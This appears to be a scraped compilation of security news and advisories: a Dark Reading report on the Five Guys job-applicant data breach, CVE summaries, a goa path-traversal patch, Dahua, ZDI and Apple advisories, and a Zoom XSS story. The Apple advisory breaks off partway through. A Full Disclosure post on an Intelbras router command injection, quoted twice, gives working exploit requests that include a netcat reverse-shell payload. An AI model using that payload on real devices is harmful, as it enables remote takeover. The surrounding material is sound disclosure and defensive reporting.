Job applicants could face a raft of follow-on attacks after cyber intruders accessed their data in an opportunistic attack.

The Five Guys burger empire has been hit with what appears to be a "smash-and-grab" operation: Cyberattackers busted into a file server and made off with the personally identifiable information (PII) of people who applied to work at the chain.

Details are scant, but in a form letter to the impacted sent out on Dec. 29, Five Guys chief operating officer Sam Chamberlain noted that an "unauthorized access to files" was discovered on Sept. 17 and was blocked the same day.

He added, "We conducted a careful review of those files and, on December 8, 2022, determined that the files contained information submitted to us in connection with the employment process, including your name and \[variable data\]."

What was that "variable data," one might ask? Turke & Strauss LLP, a law firm that's investigating the matter on behalf of the victims, identifies the information as including Social Security numbers and drivers' license data.

Five Guys did not immediately respond to a request for verification or comment from Dark Reading.

Five Guys employs about 5,000 people worldwide, according to Forbes, and presumably the turnover and number of applications for open positions is similar to other food-service jobs. But while that means that a large number of people could potentially be affected by the breach, the company has so far left it unclear how many people were actually caught up in the incident.

Five Guys also hasn't announced what, if any, shoring up of security it plans to do in the wake of the incident, only noting that it engaged law enforcement and a cybersecurity firm, and that it would provide credit monitoring. Brad Hong, customer success manager at Horizon3ai, notes that improvements to defense should be an important part of the incident response.

"An unfortunate precedent has been set \[by the infamous Equifax breach\] to simply provide credit monitoring, shifting the onus of action back to the consumer instead of the organization announcing the technological steps taken to prevent breaches in the future," he says.

**A Whole Menu of Follow-on Attacks**

Researchers note that the unfolding situation could prove difficult for both the individual victims and the burger purveyor itself. This isn't Five Guys' first time being flamed on the cybercrime grill, as BullWall executive vice president Steve Hahn notes — and a prior incident illustrates just what could be at stake for both.

"In a past breach of Five Guys, the threat actor used the stolen data to make fraudulent charges on bank debit and credit cards, and one such bank, Trustco, was hit with $100,000 in fraudulent charges from customers of theirs that have been part of this data breach," he tells Dark Reading. "If the bad guys got that much out of Trustco, imagine how much they've bilked from Chase or Bank of America.”

As for the impact to the company, Trustco went on to file a lawsuit against Five Guys in New York for damages related to issuing new cards and reimbursing victims for fraudulent charges.

In this more recent case, John Bambenek, principal threat hunter at Netenrich, notes that there are any number of follow-on attacks that threat actors could mount using the data, even if it doesn't include payment-card information.

"The most immediate use of this data is to realize there are a handful of people on the lower end of the economic scale who are looking for jobs," he says. "I imagine there will be scams and mule recruitment lures sent to those people in the near future."

Hahn meanwhile mentions that the craftier cybercriminal types will often also try to take advantage of the fear and reaction in the market when such an incident is publicized, in the form of ultra-believable phishing efforts.

"Victims may get an email: 'We apologize but as you may have heard your data was part of our data breach,'" he explains. "'Please click here to reset your password.' These emails can look identical to emails from Five Guys and they can even spoof the Five Guys domain. Once the user puts in their credentials, they threat actor now has access to all the other sites they use that password on, like PayPal, Amazon, or Venmo."

Jim Morris, chief security adviser at Tanium, also tells Dark Reading that the potential for a cybercrime ripple effect could also include extortion, affecting applicants and organizations alike.

"Any victimized organization could receive double extortion threats — i.e., ask for money to not leak or sell the data," he says. "Individuals whose information is contained in the breach could be victims of triple extortion, whereby the attackers demand money from them to in turn not sell or use their data."

**A Smash (& Grab) Burger of Data Theft**

Since the data breach notice indicates that the bad guys accessed a single file server, with no lateral movement, this is likely a case of financially motivated attackers looking for low-hanging fruit, researchers say — and finding it.

Restaurants and food-service outlets have a unique set of financial challenges (like razor-thin margins) that can often lead to them deprioritizing security, even as they collect reams of data via online ordering, reservations systems, HR systems, and more, on an order of magnitude that far outstrips other sectors, says Andrew Barratt, vice president at Coalfire.

"The challenge is real — we have adaptive threat actors who will chase down any point of access versus defenders with limited budgets and a whole raft of macro-economic stresses to focus in on too," he says. "Really, we need to keep visibility of these kind of compromises high so that executives don't discount them as 'won’t happen to me.'"

Others are less charitable. Horizon3ai's Hong adds, "Unless the attack vector in this incident was a novel one, all signs point to this incident being another example of a company that chose returns over security. With Five Guys pulling in close to $2 billion in revenue, I’d be interested to see what their cybersecurity spend was."

Meanwhile, Web-facing systems could exacerbate the risk, Casey Ellis, founder and CTO at Bugcrowd, says.

"This sounds a lot like a recruiting system where candidates upload their resumes," he tells Dark Reading. "Having these sorts of systems available to the Internet makes sense when you consider the recruiting and job application process, but if something is more available to a public user, it's also more available to a potential attacker."

He adds, "Common Web coding flaws like Indirect Object References (IDOR), authentication flaws, and even injection flaws can enable this type of attacker outcome without the need for lateral movement."

Indeed, Tanium's Morris notes that the most common break-in approaches by threat actors looking for easy pickings tend to be the exploitation of known vulnerabilities, and phishing and stolen credentials. As such, there are simple steps that could make bottom-feeding data thieves simply move on to an easier target.

"Organizations can combat these attacks by having robust life-cycle management of all computer hardware and software. This requires identifying critical assets and data and protecting them accordingly," he says. "Asset life-cycle management must also include sustainable and efficient vulnerability and patching programs. Additionally, strong authentication and authorization processes that includes multifactor authentication need to be employed."

Five Guys Data Breach Puts HR Data Under a Heat Lamp

Linux suffers from two seccomp bugs with a PT_SUSPEND_SECCOMP permission bypass and ptracer death race condition.

Linux PT_SUSPEND_SECCOMP Permission Bypass / Ptracer Death Race

StreamX applications from versions 6.02.01 to 6.04.34 are affected by a logic bug that allows to bypass the implemented authentication scheme. StreamX applications using StreamView HTML component with the public web server feature activated are affected.

CVE-2022-4779: StreamX release notes - Elvexys SA

Improper path santiziation in github.com/goadesign/goa before v3.0.9, v2.0.10, or v1.4.3 allow remote attackers to read files outside of the intended directory.

@@ -372,6 +372,10 @@ func (ctrl \*Controller) FileHandler(path, filename string) Handler { } } return func(ctx context.Context, rw http.ResponseWriter, req \*http.Request) error { // prevent path traversal if attemptsPathTraversal(req.URL.Path, path) { return ErrNotFound(req.URL.Path) } fname := filename if len(wc) \> 0 { if m, ok := ContextRequest(ctx).Params\[wc\]; ok { @@ -415,6 +419,32 @@ func (ctrl \*Controller) FileHandler(path, filename string) Handler { } }  
func attemptsPathTraversal(req string, path string) bool { if !strings.Contains(req, "..") { return false }  
currentPathIdx := 0 if idx := strings.LastIndex(path, "/\*"); idx \> \-1 && idx < len(path)\-1 { req \= req\[idx+1:\] } for \_, runeValue := range strings.FieldsFunc(req, isSlashRune) { if runeValue \== ".." { currentPathIdx\-- if currentPathIdx < 0 { return true } } else { currentPathIdx++ } } return false }  
func isSlashRune(r rune) bool { return os.IsPathSeparator(uint8(r)) }  
var replacer \= strings.NewReplacer( "&", "&amp;", "<", "&lt;",

CVE-2019-25073: v1: Prevent directory path traversal in FileHandler (#2388) · goadesign/goa@70b5a19

Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.

**Advisory ID****：**DHCC-SA-202212-001

**First Published****：**2022-12-20

Cybersecurity is an on-going challenge for all IoT connected device manufacturers and users, as it is for all digital products and services. Dahua Technology is committed to developing and maintaining state-of-the-art cybersecurity practices, including through our product design process and our customer-facing Dahua Cybersecurity Center (DHCC) for transparent vulnerability reporting and handling.

In response to security issues reported by Bashis from IPVM, Dahua immediately conducted a comprehensive investigation of affected product models and has developed patches and firmware that fix the vulnerabilities. Please download from https://software.dahuasecurity.com/en/download or contact Dahua local technical support to upgrade.

We strongly suggest, consistent with cybersecurity best practice, that all Dahua customers follow our security advisory, in order to ensure their systems are up-to-date and maximally protected. In the meantime, customers with other concerns on cybersecurity related issues, please feel free to contact us at cybersecurity@dahuatech.com.

**Summary**

1.    CVE-2022- 45423

Some Dahua software products have a vulnerability of unauthenticated request of MQTT credentials. An attacker can obtain encrypted MQTT credentials by sending a specially crafted packet to the vulnerable interface (the credentials cannot be directly exploited).

2.    CVE-2022- 45424

Some Dahua software products have a vulnerability of unauthenticated request of AES crypto key. An attacker can obtain the AES crypto key by sending a specially crafted packet to the vulnerable interface.

3.    CVE-2022- 45425

Some Dahua software products have a vulnerability of using of hard-coded cryptographic key. An attacker can obtain the AES crypto key by exploiting this vulnerability.

4.    CVE-2022- 45426

Some Dahua software products have a vulnerability of unrestricted download of file. After obtaining the permissions of ordinary users, by sending a specially crafted packet to the vulnerable interface, an attacker can download arbitrary files.

5.    CVE-2022- 45427

Some Dahua software products have a vulnerability of unrestricted upload of file. After obtaining the permissions of administrators, by sending a specially crafted packet to the vulnerable interface, an attacker can upload arbitrary files.

6.    CVE-2022- 45428

Some Dahua software products have a vulnerability of sensitive information leakage. After obtaining the permissions of administrators, by sending a specially crafted packet to the vulnerable interface, an attacker can obtain the debugging information.

7.    CVE-2022- 45429

Some Dahua software products have a vulnerability of server-side request forgery (SSRF). An Attacker can access internal resources by concatenating links (URL) that conform to specially rules.

8.    CVE-2022- 45430

Some Dahua software products have a vulnerability of unauthenticated enable or disable SSHD service. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could enable or disable the SSHD service.

Note: This vulnerability affects Linux based system only.

9.    CVE-2022- 45431

Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.

Note: This vulnerability affects Linux based system only.

10.   CVE-2022- 45432

Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server.

Note: This vulnerability affects Windows based system only.

11.   CVE-2022- 45433

Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could get the traceroute results.

Note: This vulnerability affects Windows based system only.

12.   CVE-2022- 45434

Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specially crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.

Note: This vulnerability affects Windows based system only.

**Vulnerability Score**

The vulnerability classification has been performed by using the CVSSv3.1 scoring system (http://www.first.org/cvss/speciallyation-document).

CVE-2022-45423

Base Score: 5.3(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Temporal Score: 4.8(E:P/RL:O/RC:C)

CVE-2022-45424

Base Score: 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 6.7(E:P/RL:O/RC:C)

CVE-2022-45425

Base Score: 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 6.7(E:P/RL:O/RC:C)

CVE-2022-45426

Base Score: 7.7(AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Temporal Score: 6.9(E:P/RL:O/RC:C)

CVE-2022-45427

Base Score: 8.7(AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H)

Temporal Score: 7.8(E:P/RL:O/RC:C)

CVE-2022-45428

Base Score: 4.9(AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

Temporal Score: 4.4(E:P/RL:O/RC:C)

CVE-2022-45429

Base Score: 9.8(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Temporal Score: 8.8(E:P/RL:O/RC:C)

CVE-2022-45430

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45431

Base Score: 8.6(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)

Temporal Score: 7.7(E:P/RL:O/RC:C)

CVE-2022-45432

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45433

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)

Temporal Score: 5.2(E:P/RL:O/RC:C)

CVE-2022-45434

Base Score: 5.8(AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L)

Temporal Score: 5.2(E:P/RL:O/RC:C)

**Affected Products & Fix Software**

The following product series and models are currently known to be affected.

Affected Model

Affected Version

Fix Software

Affected Area

DSS Professional

V7.002.1760000.2

Patch Installer for DSS Professional V7

Overseas

V8.0.2

Patch Installer for DSS Professional V8.0.2

V8.0.4

Patch Installer for DSS Professional V8.0.4

V8.1

Patch Installer for DSS Professional V8.1

V8.1.1

Patch Installer for DSS Professional V8.1.1

DSS Express

V1.000.175J000.2

Patch Installer for DSS Express V7

Overseas

V8.0.2

Patch Installer for DSS Express V8.0.2

V8.0.4

Patch Installer for DSS Express V8.0.4

V8.1

Patch Installer for DSS Express V8.1

V8.1.1

Patch Installer for DSS Express V8.1.1

DHI-DSS7016D-S2/DHI-DSS7016DR-S2

V1.001.0000001.2

Patch Install for DSS7016D/R-S2 V7

Overseas

V8.0.2

Patch Installer for DSS7016D/DR-S2 V8.0.2

V8.0.4

Patch Installer for DSS7016D/DR-S2 V8.0.4

V8.1

DSS7016D/DR-S2 V8.1

DHI-DSS4004-S2

V1.001.0000000.2

Patch Install for DSS4004-S2 V7

Overseas

V8.0.2

Patch Installer for DSS4004-S2 V8.0.2

V8.0.4

Patch Installer for DSS4004-S2 V8.0.4

V8.1

DSS4004-S2 V8.1

Note: To view the version, please log in to the Web and view it on the “About” page.

**Fix Software Download**

Please download the corresponding fix software or its newer version as listed in the above table from Dahua website, or contact Dahua local technical support to upgrade.

• Dahua Official website: https://software.dahuasecurity.com/en/download

• Dahua Technical Support Personnel.

**Support Resources**

For any questions or concerns related to our products and solutions, please contact Dahua DHCC at cybersecurity@dahuatech.com.

**Acknowledgment**

We acknowledge the support of Bashis from IPVM who discovered these vulnerabilities and reported them to DHCC.

**Revision History**

Version

Description

Date

V1.0

Initial public release

2022-12-20

CVE-2022-45434: Security Advisory – Vulnerabilities found in Dahua software products

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

In Planet eStream before 6.72.10.07, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username.

CVE-2022-45892: Multiple critical vulnerabilities in Planet Enterprises Ltd - Planet eStream

A link following vulnerability in the Damage Cleanup Engine component of Trend Micro Apex One and Trend Micro Apex One as a Service could allow a local attacker to escalate privileges by creating a symbolic link and abusing the service to delete a file. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

December 15th, 2022

**Trend Micro Apex One Damage Cleanup Engine Link Following Local Privilege Escalation Vulnerability****ZDI-22-1665  
ZDI-CAN-16543**

CVE ID

CVE-2022-45798

CVSS SCORE

7.8, (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Trend Micro  

AFFECTED PRODUCTS

Apex One  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Apex One Security Agent. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the Damage Cleanup Engine, which runs within the Trend Micro Common Client Real-time Scan Service. By creating a junction, an attacker can abuse the service to delete a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.  

ADDITIONAL DETAILS

Trend Micro has issued an update to correct this vulnerability. More details can be found at:  
https://success.trendmicro.com/solution/000291830  

DISCLOSURE TIMELINE

*   2022-06-28 - Vulnerability reported to vendor
*   2022-12-15 - Coordinated public release of advisory

CREDIT

Abdelhamid Naceri  

BACK TO ADVISORIES

CVE-2022-45798: ZDI-22-1665

Video conferencing platform fixes cross-site scripting vulnerability

Video conferencing platform fixes cross-site scripting vulnerability

  

Zoom has patched a cross-site scripting (XSS) bug that worked in both the desktop and web versions of its Whiteboard app.

Zoom Whiteboard allows users to collaborate in real-time on a shared canvas by adding and editing different objects. Whiteboard runs JavaScript code both in the browser and the desktop app.

**Escaping sanitization**

The XSS bug in Zoom Whiteboard was discovered by security researcher Eugene Lim (also known as ‘spaceraccoon’). Lim focuses on the overlap between web, mobile, desktop, and other platforms, which is how he became interested in investigating Zoom Whiteboard.

Whiteboard supports several types of objects, including text, shapes, rich text, images, and sticky notes.

To store and transfer objects, it uses Protocol Buffer (), a language- and platform-neutral markup standard for serializing structured data. It uses WebSocket to broadcast objects across all clients and provide real-time updates on the whiteboard.

Read more of the latest news about web security vulnerabilities

Once received, the client transforms the object into its corresponding React component and inserts it into the user interface.

React automatically sanitizes all HTML attributes contained in the whiteboard objects. However, a few of the objects allow some HTML tags. For some objects, the developers used custom regex functions to sanitize user input and remove disallowed tags.

Lim discovered that with a well-crafted HTML string, he could bypass the sanitization check and send arbitrary JavaScript code to all other clients and stage an XSS attack.

**Weaponizing the clipboard**

Exploiting the bug would require a complicated effort by the attacker.

“WebSocket messages are sent in the format. This makes it tricky to write a proof-of-concept that’s easy for triagers to reproduce because they need to intercept the WebSocket request as well as modify the message correctly before the request is dropped,” Lim told The Daily Swig.

To overcome this challenge, he developed an end-to-end proof of concept script that used the clipboard to create and deliver the XSS payload.

**The challenges of hybrid applications**

Lim believes there are two factors that make it difficult to find and plug such bugs. First is the breadth and depth of JavaScript web APIs that support additional features.

“From WebRTC (video calling) to WebGL (2D/3D graphics), there’s a lot more you can do in a browser nowadays than simply pop an alert. This increases the attack surface and potential for bypasses,” he said.

And second is the growing overlap between web and native/desktop applications.

“Developers need to secure their apps across multiple platforms, which increases the complexity as JavaScript in React on Safari might work slightly differently than React Native with Hermes on Android,” Lim said.

**Check your third-party dependencies**

Finally, Lim warned about flaws in third-party dependencies.

“Code scanning tools did not pick up the actual \[Zoom\] vulnerability because the user input flowed through a third-party dependency,” he said.

Typically, code scans in CI/CD pipelines do not install third-party dependencies and run only on the project source code.

“The takeaway here is to be very aware of the third-party components you are using and how you are using them,” Lim said. “Additionally, regexes are very tricky to do yourself so it may be better to rely on libraries like DOMPurify.”

DON’T MISS How to become a penetration tester: Part 2 – ‘Mr hacking’ John Jackson on the virtue of ‘endless curiosity’

Zoom Whiteboard patches XSS bug

Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-7 tvOS 16.2

tvOS 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213535.

Accounts  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
